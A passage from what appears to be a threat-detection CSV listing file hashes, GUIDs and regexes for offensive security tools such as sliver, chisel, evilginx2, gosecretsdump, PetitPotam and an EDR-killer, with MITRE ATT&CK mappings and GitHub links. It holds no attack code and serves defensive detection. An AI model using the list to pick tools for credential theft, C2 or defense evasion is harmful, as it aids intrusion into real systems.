- T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d737dd339a9a013f78d089c01da72576a4d89cdb2f002ffdd666d04ae726b142*",".{0,1000}d737dd339a9a013f78d089c01da72576a4d89cdb2f002ffdd666d04ae726b142.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D7484EBA-6357-4D81-B355-066E28D5DF72*",".{0,1000}D7484EBA\-6357\-4D81\-B355\-066E28D5DF72.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*d75323d0a62e8baea946b82ced3bd78c4e07a6dfa20f07480b7c093c4b977fa4*",".{0,1000}d75323d0a62e8baea946b82ced3bd78c4e07a6dfa20f07480b7c093c4b977fa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d75a64a4ef72a0c5bbdf8703bc5be50ee1569bad06a77a59e18a525c80c27a99*",".{0,1000}d75a64a4ef72a0c5bbdf8703bc5be50ee1569bad06a77a59e18a525c80c27a99.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*d780134609e2b5c9ec6b75e35c5f6eefcb1527105a584c6fbcff5dee33cebd37*",".{0,1000}d780134609e2b5c9ec6b75e35c5f6eefcb1527105a584c6fbcff5dee33cebd37.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*D78924E1-7F2B-4315-A2D2-24124C7828F8*",".{0,1000}D78924E1\-7F2B\-4315\-A2D2\-24124C7828F8.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","0","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*d7cfd598a2b8075da50af756bc164c272f247b69b1716b318b919f10cf0cfc8d*",".{0,1000}d7cfd598a2b8075da50af756bc164c272f247b69b1716b318b919f10cf0cfc8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*D7D20588-8C18-4796-B2A4-386AECF14256*",".{0,1000}D7D20588\-8C18\-4796\-B2A4\-386AECF14256.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*d7d5ed843d7c8543f15ad0b236d08c00c848c80480bae5f67083dae041ffcb67*",".{0,1000}d7d5ed843d7c8543f15ad0b236d08c00c848c80480bae5f67083dae041ffcb67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d80804bbcdbdd1933da9d9b7c0457ae73b85026e71970d1ab80af063b8fbac2e*",".{0,1000}d80804bbcdbdd1933da9d9b7c0457ae73b85026e71970d1ab80af063b8fbac2e.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*d80e2a137e1d2639c8e689549e5e17423f7ff19aa0bbfcab8e75b43c6c4b2d60*",".{0,1000}d80e2a137e1d2639c8e689549e5e17423f7ff19aa0bbfcab8e75b43c6c4b2d60.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d815672bd8c68dd861dac2266be662d32c22c7d07f13214ea84fd0cbd775ab92*",".{0,1000}d815672bd8c68dd861dac2266be662d32c22c7d07f13214ea84fd0cbd775ab92.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d87c78f071b72de76e3569729f5dce81b6379a9ef115a5e4305e1e089531938e*",".{0,1000}d87c78f071b72de76e3569729f5dce81b6379a9ef115a5e4305e1e089531938e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d8891b478ae421a3c0abc85bfa2b4bab4c4d35d46a26ba9f7fc1c6b3d0d30009*",".{0,1000}d8891b478ae421a3c0abc85bfa2b4bab4c4d35d46a26ba9f7fc1c6b3d0d30009.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d88c69e0ca8a72f71d225ece1756c338ab37ec8af40bd0cdae4d9a73ad20457e*",".{0,1000}d88c69e0ca8a72f71d225ece1756c338ab37ec8af40bd0cdae4d9a73ad20457e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d8982f57fd89ad996df4e3abe1610118575d8ae93f06cc2564c230d1c5f99d36*",".{0,1000}d8982f57fd89ad996df4e3abe1610118575d8ae93f06cc2564c230d1c5f99d36.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*D8A76296-A666-46C7-9CA0-254BA97E3B7C*",".{0,1000}D8A76296\-A666\-46C7\-9CA0\-254BA97E3B7C.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*D8B2F4F4-2B59-4457-B710-F15844570997*",".{0,1000}D8B2F4F4\-2B59\-4457\-B710\-F15844570997.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*D8BDABF6-6A96-4B48-8C1C-B6E78CBBF50E*",".{0,1000}D8BDABF6\-6A96\-4B48\-8C1C\-B6E78CBBF50E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77*",".{0,1000}d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*d8edc288ad36a1dc853851dfe2255647e17020a528f64ca22b07258f3c918118*",".{0,1000}d8edc288ad36a1dc853851dfe2255647e17020a528f64ca22b07258f3c918118.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D90EFC93-2F8B-4427-B967-0E78ED45611E*",".{0,1000}D90EFC93\-2F8B\-4427\-B967\-0E78ED45611E.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*d9137008fdb0e917c996162abb1b6d457b20c987958d4a5e496edc9666fa8392*",".{0,1000}d9137008fdb0e917c996162abb1b6d457b20c987958d4a5e496edc9666fa8392.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d919b4832a03cd1cc4c40803238e172dc2edd74317967546c4e485de14ddc5ba*",".{0,1000}d919b4832a03cd1cc4c40803238e172dc2edd74317967546c4e485de14ddc5ba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d92b4a40c783bf64d9117a9daf35b4f75426f7f1743d9939d756b327f608eda7*",".{0,1000}d92b4a40c783bf64d9117a9daf35b4f75426f7f1743d9939d756b327f608eda7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D934058E-A7DB-493F-A741-AE8E3DF867F4*",".{0,1000}D934058E\-A7DB\-493F\-A741\-AE8E3DF867F4.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*d941534ce99193cc7771684318af13748af81cf4a9a5b4fb02c791e066b563b2*",".{0,1000}d941534ce99193cc7771684318af13748af81cf4a9a5b4fb02c791e066b563b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d95bb95780308e82ee8ab7e0a2bb1867a94ab91f96ce11413ba02a15a16750f9*",".{0,1000}d95bb95780308e82ee8ab7e0a2bb1867a94ab91f96ce11413ba02a15a16750f9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d987f5f570ddac113c3083de784aac66b7550f639fb0cdd6d88bed99ae21821c*",".{0,1000}d987f5f570ddac113c3083de784aac66b7550f639fb0cdd6d88bed99ae21821c.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*d9940f5a09a04a949545eedb6818ce0ce001cc7596a63959e0940d31b6dc4834*",".{0,1000}d9940f5a09a04a949545eedb6818ce0ce001cc7596a63959e0940d31b6dc4834.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*d9c7dc1a5a792486cc3853620eb700e26a047238ba92c757b4f9d40605dbd3b8*",".{0,1000}d9c7dc1a5a792486cc3853620eb700e26a047238ba92c757b4f9d40605dbd3b8.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d9c8a6fa2ba159dea9e2bbeb86f0d329f996bbf51ff326d194968c2153aabea5*",".{0,1000}d9c8a6fa2ba159dea9e2bbeb86f0d329f996bbf51ff326d194968c2153aabea5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d9d30d28c1f342516cf9be162135f570ad63e591ce2a1a6056c96e525b635fbb*",".{0,1000}d9d30d28c1f342516cf9be162135f570ad63e591ce2a1a6056c96e525b635fbb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d9d5daaecd31c7616b01456da34cb3b51006b5a7697af4cadfa8167e7a8b6f81*",".{0,1000}d9d5daaecd31c7616b01456da34cb3b51006b5a7697af4cadfa8167e7a8b6f81.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*d9e138fbb6a18ba5a8f9405a45144f86211187609b158f862eba7a942360b3a1*",".{0,1000}d9e138fbb6a18ba5a8f9405a45144f86211187609b158f862eba7a942360b3a1.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*d9fd35586f323c9990b3da5c7c1f07c05ff88bc7*",".{0,1000}d9fd35586f323c9990b3da5c7c1f07c05ff88bc7.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*da130b91b87ce2cc4e21f221d51f2ee1d9a3052a1d414b7028a78ebf2fd8168c*",".{0,1000}da130b91b87ce2cc4e21f221d51f2ee1d9a3052a1d414b7028a78ebf2fd8168c.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*DA230B64-14EA-4D49-96E1-FA5EFED9010B*",".{0,1000}DA230B64\-14EA\-4D49\-96E1\-FA5EFED9010B.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*da23cfa752e49e813f9b47639456b433cbbdd0e4e50f4d0647c653ecce17ab97*",".{0,1000}da23cfa752e49e813f9b47639456b433cbbdd0e4e50f4d0647c653ecce17ab97.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*da2e2e4a0d34d63a452322f2fe5f57416aa79b6abb8a2a7cc3917a3b772d4cea*",".{0,1000}da2e2e4a0d34d63a452322f2fe5f57416aa79b6abb8a2a7cc3917a3b772d4cea.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*da5d6eca1efe3219fa8102a0afbf9823dc8b2c00dd53af20960ed29bca1b2cef*",".{0,1000}da5d6eca1efe3219fa8102a0afbf9823dc8b2c00dd53af20960ed29bca1b2cef.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*da6a12b87a18f943d1dd3f50a9f80313302efad3ce750c4073343d55f3b94b72*",".{0,1000}da6a12b87a18f943d1dd3f50a9f80313302efad3ce750c4073343d55f3b94b72.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*da6c929d77beb9a7cdb968a22a9e39343f27f0ac11672e11adaf3c773bd32c95*",".{0,1000}da6c929d77beb9a7cdb968a22a9e39343f27f0ac11672e11adaf3c773bd32c95.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*DA7DF89C-447D-4C2D-9C75-933037BF245E*",".{0,1000}DA7DF89C\-447D\-4C2D\-9C75\-933037BF245E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*da9ed4d88d12f0938c05fad2fcfe69ba3fd90b0bda98844cc886e5103ac62c93*",".{0,1000}da9ed4d88d12f0938c05fad2fcfe69ba3fd90b0bda98844cc886e5103ac62c93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 